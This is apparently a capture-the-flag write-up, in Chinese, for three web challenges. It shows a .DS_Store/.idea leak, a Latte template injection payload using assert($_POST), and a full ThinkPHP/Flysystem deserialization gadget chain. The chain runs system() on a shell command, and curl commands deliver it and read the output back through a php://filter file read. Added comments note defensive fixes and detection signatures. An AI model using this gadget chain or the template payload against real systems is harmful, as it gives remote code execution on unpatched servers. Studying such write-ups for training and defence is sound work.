Web#

灏妹的web#

.DS_Store 泄露了 .idea 目录
访问 .idea/dataSources.xml 得到 flag

EZupload#

覆盖 index.latte，通过换行 + 注释绕过
payload:

{=assert//123
($_POST["a"])}

EasyTp#

/?file=php://filter/convert.base64-encode/resource=../app/controller/Index.php
读到源码，其中有一个反序列化触发点
用 ///public/xxxx 绕过 parse_url，再从网上找一条能用的反序列化利用链实现 RCE
反弹连接会被断开，因此考虑将命令执行结果保存至 /tmp，然后用 /?file=php://filter 读取

<?php

namespace League\Flysystem\Cached\Storage{
// Stand-in declaration: no methods, only the two protected properties whose
// names, visibility and values must appear in the serialized output. The
// namespace presumably mirrors the framework class being impersonated; the
// real class is never loaded by this script (no include/require anywhere).
abstract class AbstractCache
{
// Serialized as-is; nothing in this file reads it.
protected $autosave = false;
// Plain string literal carried as data inside the payload. This script never
// evaluates it — whether the target does depends on code not shown here.
protected $complete = "`cat /flag > /tmp/2.txt`";
}
}

namespace think\filesystem{
use League\Flysystem\Cached\Storage\AbstractCache;
// Stand-in for the outer object of the serialized payload. Property
// declaration order (key, store) plus the inherited autosave/complete is what
// fixes the byte layout that serialize() emits below.
class CacheStore extends AbstractCache
{
protected $key = "1";
// Set by the constructor; holds whatever object the caller passes in.
protected $store;

public function __construct($store="")
{
$this->store = $store;
}
}
}

namespace think\cache{
// Stand-in base class carrying only the `options` array; the values are copied
// verbatim into the serialized object. How the target consumes each key (in
// particular 'serialize' => ['system']) is not visible from this script —
// treat the semantics as an assumption to be confirmed against the target code.
abstract class Driver
{
protected $options = [
'expire' => 0,
'cache_subdir' => true,
'prefix' => '',
'path' => '',
'hash_type' => 'md5',
'data_compress' => false,
'tag_prefix' => 'tag:',
'serialize' => ['system'],
];
}
}

namespace think\cache\driver{
use think\cache\Driver;
// Empty subclass: exists only so the serialized inner object carries the
// class name think\cache\driver\File together with Driver's `options`.
class File extends Driver{}
}

namespace{
// Build the object graph (CacheStore wrapping a File) and print it as a
// URL-encoded PHP serialization string, ready to be placed in a query parameter.
//
// NOTE(review): the only property of the target that makes this string
// dangerous is that it calls unserialize() on request input. The defensive fix
// is to never unserialize untrusted data — accept JSON via json_decode()
// instead, or at minimum call unserialize($s, ['allowed_classes' => false])
// so no application class can be instantiated from the input. For detection,
// a serialized-object prefix such as `O:<n>:"` in any request parameter is a
// high-confidence signal.
$file = new think\cache\driver\File();
$cache = new think\filesystem\CacheStore($file);
echo urlencode(serialize($cache));
}

?>

rce:

# Delivers the URL-encoded serialized object printed by the PHP script above
# (note the O%3A27%3A%22think%5Cfilesystem%5CCacheStore%22 prefix) in the
# `vulvul` query parameter; the `///public/` triple slash is the parse_url
# bypass noted earlier. Defensive takeaway: the endpoint must not hand request
# data to unserialize(), and a serialized-object signature in a query string
# is an easy, low-false-positive detection rule.
curl --noproxy "*" http://a61dca13-4e86-4a67-95bc-98f23e556b5a.easytp-ctf.dasctf.com:2333///public/index.php/Index/unser?vulvul=O%3A27%3A%22think%5Cfilesystem%5CCacheStore%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00key%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22%00%2A%00store%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A8%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A1%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A9%3A%22hash_type%22%3Bs%3A3%3A%22md5%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3Bs%3A10%3A%22tag_prefix%22%3Bs%3A4%3A%22tag%3A%22%3Bs%3A9%3A%22serialize%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7D%7Ds%3A11%3A%22%00%2A%00autosave%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00complete%22%3Bs%3A24%3A%22%60cat+%2Fflag+%3E+%2Ftmp%2F2.txt%60%22%3B%7D

getshell:

# Reads /tmp/2.txt back through the same php://filter base64 read used for the
# controller source earlier. Root cause on the defender side: a `file=`
# parameter reaching a stream wrapper unrestricted is an arbitrary local file
# read; restrict it to an allowlist of concrete files and reject any value
# containing a scheme (php://, data://, etc.).
curl --noproxy "*"  http://a61dca13-4e86-4a67-95bc-98f23e556b5a.easytp-ctf.dasctf.com:2333/public/?file=php://filter/convert.base64-encode/resource=/tmp/2.txt